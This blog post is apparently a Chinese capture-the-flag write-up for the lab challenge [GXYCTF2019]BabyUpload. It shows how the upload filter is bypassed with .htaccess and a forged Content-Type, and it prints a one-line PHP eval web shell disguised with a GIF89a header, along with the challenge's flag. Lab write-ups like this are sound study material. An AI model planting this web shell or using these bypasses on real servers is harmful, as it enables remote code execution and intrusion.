[GXYCTF2019]BabyUpload – buu刷题笔记

[GXYCTF2019]BabyUpload

图片[1]-[GXYCTF2019]BabyUpload – buu刷题笔记-安全小天地

进入靶机我们可以看到这应该是通过文件上传一句话木马之后连接蚁剑得到flag
首先我们测试一下能上传哪些文件
我先尝试上传了.jpg文件发现显示了这样一句话 不能传.jpg文件???

图片[2]-[GXYCTF2019]BabyUpload – buu刷题笔记-安全小天地

按道理来说这不合理,然后我就尝试传了另外一个.jpg文件,发现上传成功了。。。我猜测这应该是对.jpg文件的大小进行了限制。(测试之后,只要图片过小,就会报这个露骨

尝试上传php文件

图片[3]-[GXYCTF2019]BabyUpload – buu刷题笔记-安全小天地

这不就限制死了,啥php,php3,php5,phtml等都用不了了,不过还有.htaccess可以试试

这里可以参考buu文件上传第四关教程,和这个很类似

buu刷题笔记之文件上传漏洞全集-Upload-labs通关手册-安全小天地
buu刷题笔记之文件上传漏洞全集-Upload-labs通关手册-安全小天地
buu刷题笔记之文件上传漏洞全集-Upload-labs通关手册
沐寒的头像-安全小天地大咖2022年2月28日 20:21

017615

这里就不过多赘述了,只要记得

更改Content-Type: application/octet-streamContent-Type: image/jpeg就行

上传成功!
然后上传我们的一句话

GIF89a
<script language=\'php\'>@eval($_POST[\"muhan\"]);</script>

这里我们要改两个地方,第一个是将2.phtml改成2.jpg,第二个也是要改成image/jpeg

然后就是蚁剑链接,最后获得flag为flag{250166d4-3923-485d-a19f-00d70170f8a9}

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容